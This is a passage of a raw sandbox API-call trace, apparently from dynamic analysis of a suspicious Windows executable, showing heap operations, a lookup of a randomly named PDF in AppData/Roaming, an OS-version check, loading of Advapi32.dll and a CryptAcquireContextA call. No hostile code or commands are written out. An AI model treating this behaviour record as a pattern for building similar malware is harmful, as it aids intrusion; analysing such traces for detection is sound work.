RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0151.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.599] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/UGbEnsFdWrF0NcSzWk2.pdf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61a48910, ftCreationTime.dwHighDateTime=0x1d5cd48, ftLastAccessTime.dwLowDateTime=0x402b390, ftLastAccessTime.dwHighDateTime=0x1d5cfaf, ftLastWriteTime.dwLowDateTime=0x402b390, ftLastWriteTime.dwHighDateTime=0x1d5cfaf, nFileSizeHigh=0x0, nFileSizeLow=0x4d1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="UGbEnsFdWrF0NcSzWk2.pdf", cAlternateFileName="UGBENS~1.PDF")) returned 0x9e21f8 [0151.600] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0151.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0151.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0151.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0151.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0151.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0151.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0151.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0151.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.601] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.601] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.602] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.602] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0151.602] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.602] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.602] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.602] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.602] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0151.602] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0151.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.603] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.604] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.604] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0151.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.604] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0151.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0151.605] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.605] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.605] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0151.605] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.605] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0151.605] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0151.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0151.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0151.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fe0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0151.605] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0151.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.606] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0151.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.606] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0151.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.607] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.607] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.607] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.607] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.607] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.607] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.607] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.607] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.607] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.607] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.607] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0151.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.607] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0151.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.720] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.720] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.720] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.720] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.720] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.720] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.720] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.720] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.720] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.720] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.721] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.721] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.721] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.721] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.721] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.721] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 